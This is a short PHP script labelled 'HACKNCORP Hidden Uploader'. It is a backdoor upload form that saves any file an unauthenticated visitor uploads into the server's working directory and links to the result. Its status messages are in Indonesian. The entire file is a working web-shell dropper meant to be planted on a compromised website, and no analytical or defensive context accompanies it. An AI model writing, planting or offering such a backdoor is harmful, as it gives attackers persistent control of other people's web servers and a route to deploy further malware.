<?php
echo "HACKNCORP Hidden Uploader<br><form enctype='multipart/form-data' method='post'>
<input type='file' name='backdoor_file'>
<input type='submit' name='upload' value='Upload'>";
if(isset($_POST['upload'])){
$cwd = getcwd();
$tmp = $_FILES['backdoor_file']['tmp_name'];
$backdoor_file = $_FILES['backdoor_file']['name'];
if(@copy($tmp, $backdoor_file)){
echo "<br><br>Sukses => <a href='$cwd/$backdoor_file'>$cwd/$backdoor_file</a>";
}else{
echo "Gagal Upload";
}
}__halt_compiler();
?>